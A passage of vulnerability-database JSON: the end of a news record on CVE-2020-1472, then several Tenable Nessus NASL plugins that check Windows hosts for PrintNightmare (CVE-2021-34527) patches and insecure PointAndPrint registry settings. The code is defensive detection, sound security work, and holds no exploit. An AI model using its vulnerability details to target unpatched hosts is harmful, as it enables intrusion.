"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-01-13T08:16:41", "id": "THN:A30AE10A13D33189456EB192DDF2B8C2", "href": "https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:31:32", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004951: Windows 7 and Windows Server 2008 R2 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004951.NASL", "href": "https://www.tenable.com/plugins/nessus/151476", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151476);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004951\");\n script_xref(name:\"MSKB\", value:\"5004953\");\n script_xref(name:\"MSFT\", value:\"MS21-5004951\");\n script_xref(name:\"MSFT\", value:\"MS21-5004953\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004951: Windows 7 and Windows Server 2008 R2 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004951\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004951\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004951'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004951])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004960: Windows Server 2012 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004960.NASL", "href": "https://www.tenable.com/plugins/nessus/151479", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151479);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004960\");\n script_xref(name:\"MSFT\", value:\"MS21-5004960\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004960: Windows Server 2012 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004960\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004960\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004960'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004960])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:21", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004948: Windows 10 1607 and Windows Server 2016 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004948.NASL", "href": "https://www.tenable.com/plugins/nessus/151474", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151474);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004948\");\n script_xref(name:\"MSFT\", value:\"MS21-5004948\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004948: Windows 10 1607 and Windows Server 2016 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004948\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004948\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004948'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'14393',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004948])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges. The remote system is not fully secure as the point and print registry settings contain an insecure configuration in one of the following locations/keys:\n\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\NoWarningNoElevationOnInstall\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\UpdatePromptSettings", "cvss3": {}, "published": "2021-07-09T00:00:00", "type": "nessus", "title": "Windows PrintNightmare Registry Exposure CVE-2021-34527 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-02-27T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/151488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151488);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/27\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004945\");\n script_xref(name:\"MSKB\", value:\"5004946\");\n script_xref(name:\"MSKB\", value:\"5004947\");\n script_xref(name:\"MSKB\", value:\"5004948\");\n script_xref(name:\"MSKB\", value:\"5004950\");\n script_xref(name:\"MSKB\", value:\"5004951\");\n script_xref(name:\"MSKB\", value:\"5004953\");\n script_xref(name:\"MSKB\", value:\"5004954\");\n script_xref(name:\"MSKB\", value:\"5004955\");\n script_xref(name:\"MSKB\", value:\"5004956\");\n script_xref(name:\"MSKB\", value:\"5004958\");\n script_xref(name:\"MSKB\", value:\"5004959\");\n script_xref(name:\"MSKB\", value:\"5004960\");\n script_xref(name:\"MSFT\", value:\"MS21-5004945\");\n script_xref(name:\"MSFT\", value:\"MS21-5004946\");\n script_xref(name:\"MSFT\", value:\"MS21-5004947\");\n script_xref(name:\"MSFT\", value:\"MS21-5004948\");\n script_xref(name:\"MSFT\", value:\"MS21-5004950\");\n script_xref(name:\"MSFT\", value:\"MS21-5004951\");\n script_xref(name:\"MSFT\", value:\"MS21-5004953\");\n script_xref(name:\"MSFT\", value:\"MS21-5004954\");\n script_xref(name:\"MSFT\", value:\"MS21-5004955\");\n script_xref(name:\"MSFT\", value:\"MS21-5004956\");\n script_xref(name:\"MSFT\", value:\"MS21-5004958\");\n script_xref(name:\"MSFT\", value:\"MS21-5004959\");\n script_xref(name:\"MSFT\", value:\"MS21-5004960\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"Windows PrintNightmare Registry Exposure CVE-2021-34527 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \n operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges. \n \n The remote system is not fully secure as the point and print registry settings contain an insecure configuration in \n one of the following locations/keys:\n\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\NoWarningNoElevationOnInstall\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\UpdatePromptSettings\");\n # https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c80300b5\");\n # https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.Printing::PointAndPrint_Restrictions_Win7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2cdd3bd3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004948\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004950\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004951\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004953\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004956\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004958\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004959\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004960\");\n script_set_attribute(attribute:\"solution\", value:\n\"See Vendor Advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-07';\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar my_os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\nvar my_os_build = get_kb_item('SMB/WindowsVersionBuild');\nvar mitigated = TRUE; # by default: These registry keys do not exist by default, and therefore are already at the secure setting\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif(my_os == '10')\n{\n if( \n (my_os_build != '10240') && \n (my_os_build != '14393') && \n (my_os_build != '17763') && \n (my_os_build != '18363') && \n (my_os_build != '19041') && \n (my_os_build != '19042') && \n (my_os_build != '19043') \n ) exit(0, 'Windows version ' + my_os + ', build ' + my_os_build + ' is not affected.');\n}\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n## Check mitigation\nvar keys = make_list(\n 'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Printers\\\\PointAndPrint\\\\NoWarningNoElevationOnInstall',\n 'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Printers\\\\PointAndPrint\\\\UpdatePromptSettings');\n\nhotfix_check_fversion_init();\nregistry_init();\nvar hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nvar values = get_registry_values(handle:hklm, items:keys);\nRegCloseKey(handle:hklm);\n\nvar report = '\\n Nessus detected the following insecure registry key configuration:\\n';\n# MS: must confirm that the following registry settings are set to 0 (zero) or are not defined\n# if defined and empty we are exposed; so isNull over empty_or_null()\n# setup reporting\nforeach var key (keys)\n{\n if(!isnull(values[key]) && (values[key] != 0) )\n {\n report += ' - ' + key + ' is set to ' + values[key] + '\\n';\n mitigated = FALSE;\n }\n}\nhotfix_add_report(report);\n\n# if we don't have any patches or the registry is insecurely configured, alert.\nif(!mitigated)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004958: Windows Server 2012 R2 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004958.NASL", "href": "https://www.tenable.com/plugins/nessus/151477", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004954\");\n script_xref(name:\"MSKB\", value:\"5004958\");\n script_xref(name:\"MSFT\", value:\"MS21-5004954\");\n script_xref(name:\"MSFT\", value:\"MS21-5004958\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004958: Windows Server 2012 R2 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004958\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004958\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 